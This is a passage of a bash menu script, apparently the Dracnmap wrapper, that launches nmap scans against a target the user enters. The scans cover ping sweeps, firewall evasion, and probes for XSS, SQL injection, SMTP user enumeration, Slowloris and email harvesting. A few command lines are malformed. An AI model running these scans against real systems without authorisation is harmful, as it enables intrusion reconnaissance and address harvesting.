- then
- clear
- exploit
- elif test $ceh == '5'
- then
- clear
- fuzzer
- elif test $ceh == '6'
- then
- echo
- clear
- malware
- elif test $ceh == '7'
- then
- echo
- clear
- vuln
- elif test $ceh == '8'
- then
- menu
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- nse
- fi
- }
- ################################################
- # PING PING BEBEB
- ################################################
- function pingbebeb() {
- echo -e $okegreen " "
- clear
- echo " "
- echo " "
- echo ""
- echo " \|/ "
- echo " .-*- "
- echo " / /|\ "
- echo " _L_ "
- echo " , . "
- echo -e $okegreen" (\ / O O \ /) $red ______ _______ _______ _______ __ __ "
- echo -e $okegreen" \| _ |/ $red | __ \_ _| | | __| | | | "
- echo -e $okegreen" \ (_) / $red | __/_| |_| | | | |__|__| "
- echo -e $okegreen" _/.___,\_ $red |___| |_______|__|____|_______| |__|__| "
- echo -e $okegreen" (_/ alf \_) "
- echo -e $white " "
- echo -e $white" [$okegreen"01"$white]$cyan BROADCAST PING "
- echo -e $white" [$okegreen"02"$white]$cyan TCP SYN PING SCANS "
- echo -e $white" [$okegreen"03"$white]$cyan TCP ACK PING SCANS "
- echo -e $white" [$okegreen"04"$white]$cyan UDP PING SCANS "
- echo -e $white" [$okegreen"05"$white]$cyan ICMP PING SCANS "
- echo -e $white" [$okegreen"06"$white]$cyan IP PROTOCOL PING SCANS "
- echo -e $white" [$okegreen"07"$white]$cyan BACK "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@PING!:\033[0m>> '; tput sgr0 #insert your choice
- read DrS
- if test $DrS == '1'
- then
- echo -e $cyan""
- echo -n " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script broadcast-ping --script-args broadcast-ping.num_probes=5 $ip &
- pingbebeb
- elif test $DrS == '2'
- then
- echo -e $cyan""
- echo -n " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sP -PS $ip &
- pingbebeb
- elif test $DrS == '3'
- then
- echo -e $cyan""
- echo -n " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sP -PA $ip &
- pingbebeb
- elif test $DrS == '4'
- then
- echo -e $cyan""
- echo -n " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sP -PU $ip &
- pingbebeb
- elif test $DrS == '5'
- then
- echo -e $cyan""
- echo -n " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sP -PE $ip &
- pingbebeb
- elif test $DrS == '6'
- then
- echo -e $cyan""
- echo -n " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sP -PO --packet-trace $ip &
- pingbebeb
- elif test $DrS == '7'
- then
- menu
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $cyan " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- pingbebeb
- fi
- }
- ###############################################
- # ZENMAP
- ###############################################
- function zenmapscript() {
- clear
- clear
- echo ""
- echo -e $okegreen" ===================================================================="
- echo -e $cyan""
- echo " +--^----------,--------,-----,--------^-, "
- echo -e " | $red ||||||||| -------- | O "
- echo -e $cyan" +---------------------------^----------| "
- echo -e $cyan" \_,---------,---------,--------------' "
- echo -e " / $red"XXXXXX"$cyan /'| /' "
- echo -e " / $red"XXXXXX"$cyan / \ /' "
- echo -e " / $red"XXXXXX"$cyan / _______/ "
- echo -e " / $red"XXXXXX"$cyan / "
- echo -e " / $red"XXXXXX"$cyan / "
- echo " (________( "
- echo -e " ------' $red DOUBLE KILL !! GO GO GO !! "
- echo ""
- echo -e $okegreen" ====================================================================="
- echo -e $cyan " Scanning Target with $red'advanced command ( Zenmap Command ) "
- echo -e $okegreen" ====================================================================="
- echo ""
- echo ""
- echo -e $white" [$okegreen"01"$white]$cyan ITENSE SCAN"
- echo -e $white" [$okegreen"02"$white]$cyan ITENSE SCAN + UDP "
- echo -e $white" [$okegreen"03"$white]$cyan ITENSE SCAN ALL TCP PORTS "
- echo -e $white" [$okegreen"04"$white]$cyan QUICK SCAN "
- echo -e $white" [$okegreen"05"$white]$cyan QUICK SCAN PLUS PLUS "
- echo -e $white" [$okegreen"06"$white]$cyan QUICK TRACEROUT "
- echo -e $white" [$okegreen"07"$white]$cyan COMPREHENSIVE SCAN [BEST] "
- echo -e $white" [$okegreen"08"$white]$cyan BACK "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@Headshot:\033[0m>> '; tput sgr0 #insert your choice
- read Scanning
- if test $Scanning == '1'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -T4 -A -v $ip &
- elif test $Scanning == '2'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sS -sU -T4 -A -v $ip &
- elif test $Scanning == '3'
- then
- echo
- echo -ne $okegreen" What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 1-65535 -T4 -A -v $ip &
- elif test $Scanning == '4'
- then
- echo
- echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0
- read ip
- $urxvt -T4 -F $ip &
- elif test $Scanning == '5'
- then
- echo
- echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0
- read ip
- $urxvt -sV -T4 -O -F --version-light $ip &
- elif test $Scanning == '6'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: "; tput sgr0
- read ip
- $urxvt -sn --traceroute $ip &
- elif test $Scanning == '7'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip &
- elif test $Scanning == '8'
- then
- menu
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- zenmapscript
- fi
- }
- ################################################
- # PSCANNING FOR WEB SERVICE
- ################################################
- function WebService() {
- clear
- echo -e $cyan ""
- echo ""
- echo -e $red " __ __ ___. _________ .__ ";
- echo "/ \ / \ ____\_ |__ / _____/ ______________ _|__| ____ ____ ";
- echo "\ \/\/ // __ \| __ \ \_____ \_/ __ \_ __ \ \/ / |/ ___\/ __ \ ";
- echo " \ /\ ___/| \_\ \ / \ ___/| | \/\ /| \ \__\ ___/ ";
- echo " \__/\ / \___ >___ / /_______ /\___ >__| \_/ |__|\___ >___ >";
- echo -e $okegreen
- echo " -----------------------------------------------------------------------"
- echo ""
- echo -e $white" [$okegreen"01"$white]$cyan DETECTING WEB APPLICATION FIREWALLS "
- echo -e $white" [$okegreen"02"$white]$cyan DETECTING POSSIBLE XST VULNERABILITIES "
- echo -e $white" [$okegreen"03"$white]$cyan DETECTING OPEN RELAYS "
- echo -e $white" [$okegreen"04"$white]$cyan DETECTING BACKDOOR SMTP SERVERS "
- echo -e $white" [$okegreen"05"$white]$cyan DETECTING CROSS SITE SCRIPTING VULNERABILITIES "
- echo -e $white" [$okegreen"06"$white]$cyan ENUMERATING USERS IN AN SMTP SERVER "
- echo -e $white" [$okegreen"07"$white]$cyan DETECTING WEB SERVERS VULNERABLE TO SLOWLORIS DDOS "
- echo -e $white" [$okegreen"08"$white]$cyan FINDING SQL INJECTION VULNERABILITIES "
- echo -e $white" [$okegreen"09"$white]$cyan CHECK IP GEOLOCATION WITH NSE "
- echo -e $white" [$okegreen"10"$white]$cyan GATHERING INFORMATION FROM WHOIS (NSE) "
- echo -e $white" [$okegreen"11"$white]$cyan COLLECTING VALID EMAIL ADDRES "
- echo -e $white" [$okegreen"12"$white]$cyan BACK "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@WebService:\033[0m>> '; tput sgr0 #insert your choice
- read Scanning
- if test $Scanning == '1'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22 $ip &
- elif test $Scanning == '2'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- nmap -sS -sU -T4 -A -v $ip
- $urxvt -p80 --script http-methods,http-trace --script-args http-methods.retest $ip &
- elif test $Scanning == '3'
- then
- echo
- echo -ne $okegreen" What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script smtp-open-relay -v $ip &
- elif test $Scanning == '4'
- then
- echo
- echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0
- read ip
- $urxvt nmap -sn $ip
- echo -e ""
- $urxvt -sV --script smtp-strangeport $ip &
- elif test $Scanning == '5'
- then
- echo
- echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0
- read ip
- $urxvt -p80 --script http-phpself-xss,http-unsafe-output-escaping $ip &
- elif test $Scanning == '6'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: "; tput sgr0
- read ip
- $urxvt -p25 –script smtp-enum-users $ip &
- elif test $Scanning == '7'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-slowloris --max-parallelism 300 $ip &
- elif test $Scanning == '8'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-sql-injection $ip &
- elif test $Scanning == '9'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -Pn -p80 --script ip-geolocation-* $ip &
- elif test $Scanning == '10'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sn --script whois-ip --script-args whois.whodb=nocache $ip &
- elif test $Scanning == '11'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-google-email,http-email-harvest $ip &
- elif test $Scanning == '12'
- then
- menu
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- WebService
- fi
- }
- #######################################################
- # CREDITS
- #######################################################
- function credits {
- clear
- echo -e "
- \033[31m##########################################################################\033[m
- Credits To
- \033[31m##########################################################################\033[m"
- echo
- echo -e $white "Special thanks to:"
- echo
- echo -e $red "Dracos Linux ( www.dracos-linux.org )"
- echo
- echo -e $okegreen "Offensive Security for the awesome OS"
- echo
- echo -e $green "http://www.offensive-security.com/"
- echo
- echo -e $yellow "http://www.kali.org/"
- echo
- echo -e $cyan "http://www.kitploit.com/"
- echo
- echo -e $white "http://www.linuxsec.org/"
- echo
- echo -e $okegreen "My Friend for helpme ( Boy Suganda )"
- echo
- echo -e $red "Big Thanks to : http://www.github.com/"
- echo
- }
- ###################################################
- # Function Menu
- #####################################################
- function menu() {
- clear
- echo -e $red ""
- echo " 80G08 "
- echo " 8G#G@8 "
- echo " 8##0 "
- echo " 0##G8 "
- echo " ####08 "
- echo " 8#####8 "
- echo " G#####8 "
- echo " 8G#####8 "
- echo " #8#########0 #######8 "
- echo " 8#######0 0#88##### "
- echo " 8G####8 8 8#8@@8### "
- echo " 8### G8 8@G###### "
- echo " 8##88 8 8######8 "
- echo " G##088 80G##G080 "
- echo " 88000000008880# 000 "
- echo " 9 0 "
- echo -e $okegreen" .___ _______ ";
- echo " __| _/___________ ____ \ \ _____ _____ ______ ";
- echo " / __ |\_ __ \__ \ _/ ___\ / | \ / \\__ \ \____ \ ";
- echo " / /_/ | | | \// __ \\ \___/ | \ Y Y \/ __ \| |_> >";
- echo " \____ | |__| (____ /\___ >____|__ /__|_| (____ / __/ ";
- echo " \/ \/ \/ \/ \/ \/|__| ";
- echo ""
- echo -e $cyan" Script by $white":" $red Edo Maland ( Screetsec ) "
- echo -e $cyan" Version $white":" $red $Version "
- echo -e $cyan" Codename $white":" $red $Codename "
- echo -e $cyan" Follow me on Github $white":" $red @Screetsec "
- echo -e $cyan" Dracos Linux $white":" $red dracos-linux.org "
- echo -e $cyan ""
- echo -e $okegreen" ========================================================= ";
- echo -e $white " "
- echo -e $white" [$okegreen"01"$white]$cyan REGULER SCAN "
- echo -e $white" [$okegreen"02"$white]$cyan SCAN MULTIPLE IP ADDRESS "
- echo -e $white" [$okegreen"03"$white]$cyan SCAN OS VERSION AND TRACEROUTE "
- echo -e $white" [$okegreen"04"$white]$cyan FIND OUT IF A HOST IS PROTECTED FIREWALL "
- echo -e $white" [$okegreen"05"$white]$cyan EVADING FIREWALLS "
- echo -e $white" [$okegreen"06"$white]$cyan PING PING !! "
- echo -e $white" [$okegreen"07"$white]$cyan WEB SERVICES"
- echo -e $white" [$okegreen"08"$white]$cyan NMAP SCRIPT ENGINE - ADVANCED "
- echo -e $white" [$okegreen"09"$white]$cyan ADVANCED NMAP SCANNINGS ( ZENMAP COMMAND ) "
- echo -e $white" [$okegreen"10"$white]$cyan SCANNING TARGET WITH OUTPUT FILES"
- echo -e $white" [$okegreen"11"$white]$cyan CREDITS "
- echo -e $white" [$okegreen"12"$white]$cyan EXIT "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@dracmap-v2:\033[0m '; tput sgr0 #insert your choice
- read Dracnmap
- if test $Dracnmap == '1'
- then
- echo -e $cyan""
- echo -ne " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt $ip &
- elif test $Dracnmap == '2'
- then
- echo ""
- echo -ne $okegreen" What is your IP Target or Host (1): " ; tput sgr0
- read ip1
- echo ""
- echo -ne $okegreen " What is your IP Target or Host (2): " ; tput sgr0
- read ip2
- echo ""
- echo -ne $okegreen " What is your IP Target or Host (3): " ; tput sgr0
- read ip3
- echo ""
- $urxvt $ip1 $ip2 $ip3 &
- elif test $Dracnmap == '3'
- then
- echo -e $cyan""
- echo -ne " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV -T4 -O -F --version-light 1 $ip &
- elif test $Dracnmap == '4'
- then
- echo -e $cyan""
- echo -ne " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt nmap -sA $ip &
- elif test $Dracnmap == '5'
- then
- echo -e $cyan""
- echo -ne " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sS -P0 $ip &
- elif test $Dracnmap == '6'
- then
- pingbebeb
- elif test $Dracnmap == '7'
- then
- WebService
- elif test $Dracnmap == '8'
- then
- nse
- elif test $Dracnmap == '9'
- then
- zenmapscript
- elif test $Dracnmap == '10'
- then
- scanoutput
- elif test $Dracnmap == '11'
- then
- credits
- elif test $Dracnmap == '12'
- then
- clear
- sleep 1
- echo ""
- echo -e $yellow"[*] Thank You For Using Dracnmap =)."
- echo ""
- echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P."
- exit
- else
- echo -e " Incorrect Number"
- fi
- echo -n -e " Do you want exit? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- exit
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- menu
- fi
- }
- ####################################################
- # BANNER
- ####################################################
- clear
- echo -e $red ""
- echo " 80G08 "
- echo " 8G#G@8 "
- echo " 8##0 "
- echo " 0##G8 "
- echo " ####08 "
- echo " 8#####8 "
- echo " G#####8 "
- echo " 8G#####8 "
- echo " #8#########0 #######8 "
- echo " 8#######0 0#88##### "
- echo " 8G####8 8 8#8@@8### "
- echo " 8### G8 8@G###### "
- echo " 8##88 8 8######8 "
- echo " G##088 80G##G080 "
- echo " 88000000008880# 000 "
- echo " 9 0 "
- echo -e $okegreen" .___ _______ ";
- echo " __| _/___________ ____ \ \ _____ _____ ______ ";
- echo " / __ |\_ __ \__ \ _/ ___\ / | \ / \\__ \ \____ \ ";
- echo " / /_/ | | | \// __ \\ \___/ | \ Y Y \/ __ \| |_> >";
- echo " \____ | |__| (____ /\___ >____|__ /__|_| (____ / __/ ";
- echo " \/ \/ \/ \/ \/ \/|__| ";
- echo ""
- echo -e $cyan" Script by $white":" $red Edo Maland ( Screetsec ) "
- echo -e $cyan" Version $white":" $red $Version "
- echo -e $cyan" Codename $white":" $red $Codename "
- echo -e $cyan" Follow me on Github $white":" $red @Screetsec "
- echo -e $cyan" Dracos Linux $white":" $red dracos-linux.org "
- echo -e $cyan ""
- echo -e $okegreen" ========================================================= ";
- echo -e $white " "
- echo -e $white" [$okegreen"01"$white]$cyan REGULER SCAN "
- echo -e $white" [$okegreen"02"$white]$cyan SCAN MULTIPLE IP ADDRESS "
- echo -e $white" [$okegreen"03"$white]$cyan SCAN OS VERSION AND TRACEROUTE "
- echo -e $white" [$okegreen"04"$white]$cyan FIND OUT IF A HOST IS PROTECTED FIREWALL "
- echo -e $white" [$okegreen"05"$white]$cyan EVADING FIREWALLS "
- echo -e $white" [$okegreen"06"$white]$cyan PING PING !! "
- echo -e $white" [$okegreen"07"$white]$cyan WEB SERVICES"
- echo -e $white" [$okegreen"08"$white]$cyan NMAP SCRIPT ENGINE - ADVANCED "
- echo -e $white" [$okegreen"09"$white]$cyan ADVANCED NMAP SCANNINGS ( ZENMAP COMMAND ) "
- echo -e $white" [$okegreen"10"$white]$cyan SCANNING TARGET WITH OUTPUT FILES"
- echo -e $white" [$okegreen"11"$white]$cyan CREDITS "
- echo -e $white" [$okegreen"12"$white]$cyan EXIT "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@dracmap-v2:\033[0m '; tput sgr0 #insert your choice
- read Dracnmap
- if test $Dracnmap == '1'
- then
- echo -e $cyan""
- echo -ne " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt $ip &
- elif test $Dracnmap == '2'
- then
- echo ""
- echo -ne $okegreen" What is your IP Target or Host (1): " ; tput sgr0
- read ip1
- echo ""
- echo -ne $okegreen " What is your IP Target or Host (2): " ; tput sgr0
- read ip2
- echo ""
- echo -ne $okegreen " What is your IP Target or Host (3): " ; tput sgr0
- read ip3
- echo ""
- $urxvt $ip1 $ip2 $ip3 &
- elif test $Dracnmap == '3'
- then
- echo -e $cyan""
- echo -ne " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV -T4 -O -F --version-light 1 $ip &
- elif test $Dracnmap == '4'
- then
- echo -e $cyan""
- echo -ne " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt nmap -sA $ip &
- elif test $Dracnmap == '5'
- then
- echo -e $cyan""
- echo -ne " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sS -P0 $ip &
- elif test $Dracnmap == '6'
- then
- pingbebeb
- elif test $Dracnmap == '7'
- then
- WebService
- elif test $Dracnmap == '8'
- then
- nse
- elif test $Dracnmap == '9'
- then
- zenmapscript
- elif test $Dracnmap == '10'
- then
- scanoutput
- elif test $Dracnmap == '11'
- then
- credits
- elif test $Dracnmap == '12'
- then
- clear
- sleep 1
- echo ""
- echo -e $yellow"[*] Thank You For Using Dracnmap =)."
- echo ""
- echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P."
- exit
- else
- echo -e " Incorrect Number"
- fi
- echo -n -e " Do you want exit? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- exit
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- menu
- fi
Add Comment
Please, Sign In to add comment